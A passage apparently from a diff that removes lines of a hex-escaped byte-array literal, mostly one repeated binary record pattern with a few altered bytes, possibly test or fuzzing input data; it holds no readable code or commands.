-"\xca\x6e\x00\x00\xcd\x6e\x00\x00\xd2\x6e\x00\x00\xdd\x6e\x00\x00" -"\xec\x6e\x00\x00\xf5\x6e\x00\x00\x03\x6f\x00\x00\x04\x6f\x00\x00" -"\x07\x6f\x00\x00\x0b\x6f\x00\x00\x15\x6f\x00\x00\x24\x6f\x00\x00" -"\x2e\x6f\x00\x00\x3c\x6f\x00\x00\x3d\x6f\x00\x00\x3e\x6f\x00\x00" -"\xc8\x6f\x00\x00\xac\x70\x00\x00\x4b\x71\x00\x00\x6f\x71\x00\x00" -"\xdd\x71\x00\x00\xde\x71\x00\x00\x1f\x72\x00\x00\x63\x72\x00\x00" -"\x64\x72\x00\x00\x92\x72\x00\x00\x58\x73\x00\x00\x59\x73\x00\x00" -"\x8a\x73\x00\x00\xb1\x73\x00\x00\xdf\x73\x00\x00\xf0\x73\x00\x00" -"\x06\x74\x00\x00\x17\x74\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x7d\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" 
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" 
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\xeb\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" 
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\xe0\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" 
